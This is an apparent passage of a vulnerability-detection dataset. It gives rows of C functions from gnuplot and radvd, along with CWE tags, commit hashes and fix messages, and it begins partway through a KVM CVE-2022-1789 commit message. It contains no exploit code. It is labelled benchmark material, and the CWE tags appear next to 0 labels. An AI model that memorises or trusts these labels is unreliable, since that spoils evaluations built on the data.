to kvm_mmu_invpcid_gva. If INVPCID is executed with CR0.PG=0, the
invlpg callback is not set and the result is a NULL pointer dereference.
Fix it trivially by checking for mmu->invlpg before every call.
There are other possibilities:
- check for CR0.PG, because KVM (like all Intel processors after P5)
flushes guest TLB on CR0.PG changes so that INVPCID/INVLPG are a
nop with paging disabled
- check for EFER.LMA, because KVM syncs and flushes when switching
MMU contexts outside of 64-bit mode
All of these are tricky, go for the simple solution. This is CVE-2022-1789.
Reported-by: Yongkang Jia <[email protected]>
Cc: [email protected]
Signed-off-by: Paolo Bonzini <[email protected]>
|
if_command()
{
if_else_command(IF_INITIAL);
return;
}
| 0 |
[
"CWE-415"
] |
gnuplot
|
052cbd17c3cbbc602ee080b2617d32a8417d7563
| 171,826,649,113,606,440,000,000,000,000,000,000,000 | 5 |
successive failures of "set print <foo>" could cause double-free
Bug #2312
|
privsep_read_loop(void)
{
struct privsep_command cmd;
int ret;
while (1) {
ret = readn(pfd, &cmd, sizeof(cmd));
if (ret <= 0) {
/* Error or EOF, give up */
if (ret < 0) {
flog(LOG_ERR, "Exiting, privsep_read_loop had readn error: %s\n",
strerror(errno));
} else {
flog(LOG_ERR, "Exiting, privsep_read_loop had readn return 0 bytes\n");
}
close(pfd);
_exit(0);
}
if (ret != sizeof(cmd)) {
/* Short read, ignore */
return;
}
cmd.iface[IFNAMSIZ-1] = '\0';
switch(cmd.type) {
case SET_INTERFACE_LINKMTU:
if (cmd.val < MIN_AdvLinkMTU || cmd.val > MAX_AdvLinkMTU) {
flog(LOG_ERR, "(privsep) %s: LinkMTU (%u) is not within the defined bounds, ignoring", cmd.iface, cmd.val);
break;
}
ret = set_interface_var(cmd.iface, PROC_SYS_IP6_LINKMTU, "LinkMTU", cmd.val);
break;
case SET_INTERFACE_CURHLIM:
if (cmd.val < MIN_AdvCurHopLimit || cmd.val > MAX_AdvCurHopLimit) {
flog(LOG_ERR, "(privsep) %s: CurHopLimit (%u) is not within the defined bounds, ignoring", cmd.iface, cmd.val);
break;
}
ret = set_interface_var(cmd.iface, PROC_SYS_IP6_CURHLIM, "CurHopLimit", cmd.val);
break;
case SET_INTERFACE_REACHTIME:
if (cmd.val < MIN_AdvReachableTime || cmd.val > MAX_AdvReachableTime) {
flog(LOG_ERR, "(privsep) %s: BaseReachableTimer (%u) is not within the defined bounds, ignoring", cmd.iface, cmd.val);
break;
}
ret = set_interface_var(cmd.iface, PROC_SYS_IP6_BASEREACHTIME_MS, "BaseReachableTimer (ms)", cmd.val);
if (ret == 0)
break;
set_interface_var(cmd.iface, PROC_SYS_IP6_BASEREACHTIME, "BaseReachableTimer", cmd.val / 1000);
break;
case SET_INTERFACE_RETRANSTIMER:
if (cmd.val < MIN_AdvRetransTimer || cmd.val > MAX_AdvRetransTimer) {
flog(LOG_ERR, "(privsep) %s: RetransTimer (%u) is not within the defined bounds, ignoring", cmd.iface, cmd.val);
break;
}
ret = set_interface_var(cmd.iface, PROC_SYS_IP6_RETRANSTIMER_MS, "RetransTimer (ms)", cmd.val);
if (ret == 0)
break;
set_interface_var(cmd.iface, PROC_SYS_IP6_RETRANSTIMER, "RetransTimer", cmd.val / 1000 * USER_HZ); /* XXX user_hz */
break;
default:
/* Bad command */
break;
}
}
}
| 0 |
[
"CWE-20"
] |
radvd
|
074816cd0b37aac7b3209987e6e998f0a847b275
| 262,336,770,397,884,330,000,000,000,000,000,000,000 | 71 |
privsep_read_loop() should return on unprivileged daemon death /
socket close(), not loop forever with polling read() getting -1.
|
Subsets and Splits
CWE 416 & 19
The query filters records related to specific CWEs (Common Weakness Enumerations), providing a basic overview of entries with these vulnerabilities but without deeper analysis.
CWE Frequency in Train Set
Counts the occurrences of each CWE (Common Weakness Enumeration) in the dataset, providing a basic distribution but limited insight.